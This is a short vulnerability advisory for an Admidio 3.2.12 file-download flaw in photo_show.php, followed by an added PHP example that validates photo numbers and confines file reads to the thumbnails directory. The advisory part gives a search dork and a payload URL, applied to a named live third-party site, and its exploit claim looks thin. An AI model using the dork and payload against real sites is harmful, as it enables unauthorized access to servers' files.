============================================================================================================================
| # Title : Admidio 3.2.12 Arbitrary File Download Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Fr V.(Pro) |
| # Vendor : https://www.admidio.org/ |
| # Dork : "© 2004 - 2017 Admidio Team" |
============================================================================================================================
PoC :
File : adm_program\modules\photos\photo_show.php
Line : 105
readfile($ordner.'/thumbnails/'.$getPhotoNr.'.jpg');
[+] Dorking in Google or other search engine.
[+] Use payload : modules/photos/photo_show.php?pho_id=0&photo_nr=1&thumb=1
http://www.cvjm-reutlingen.de/admidio/adm_program/modules/photos/photo_show.php?pho_id=0&photo_nr=1&thumb=1
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================
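
Added example (not part of the original advisory and not Admidio's own code): one way to guard the readfile() call quoted above, by validating the photo number as an integer and confirming the resolved path stays inside the album's thumbnails directory. resolveThumbnail() is a hypothetical helper; $ordner and $getPhotoNr are the names from the quoted line, and the temp-directory album and its files are constructed sample data.

```php
<?php
// Added example, not Admidio code. resolveThumbnail() is a hypothetical helper.
function resolveThumbnail(string $ordner, $getPhotoNr): ?string
{
    // 1. The photo number must be a positive integer; anything else
    //    (separators, dots, NUL bytes, empty string) is rejected outright.
    $nr = filter_var($getPhotoNr, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($nr === false) {
        return null;
    }

    // 2. Canonicalise the thumbnails directory and the candidate file.
    $base = realpath($ordner . '/thumbnails');
    if ($base === false) {
        return null;
    }
    $file = realpath($base . DIRECTORY_SEPARATOR . $nr . '.jpg');
    if ($file === false || !is_file($file)) {
        return null;
    }

    // 3. Defence in depth: the canonical path must still sit under $base,
    //    which also catches a symlink planted inside the thumbnails folder.
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Constructed sample album: one real thumbnail, one file that must never be served.
$album = sys_get_temp_dir() . '/adm_example_' . getmypid();
mkdir($album . '/thumbnails', 0700, true);
file_put_contents($album . '/thumbnails/1.jpg', 'constructed thumbnail');
file_put_contents($album . '/secret.txt', 'constructed secret');

// Constructed inputs: a valid number, a missing photo, and non-integer values.
foreach (['1', '2', '../secret.txt', '1/../../secret', "1\0", ''] as $input) {
    $path = resolveThumbnail($album, $input);
    printf("%-20s => %s\n", json_encode($input), $path === null ? 'rejected' : 'served');
}

// Remove the constructed files again.
unlink($album . '/thumbnails/1.jpg');
unlink($album . '/secret.txt');
rmdir($album . '/thumbnails');
rmdir($album);
```

In the real script the caller would pass the returned path to readfile() and answer with a 404 when the helper returns null.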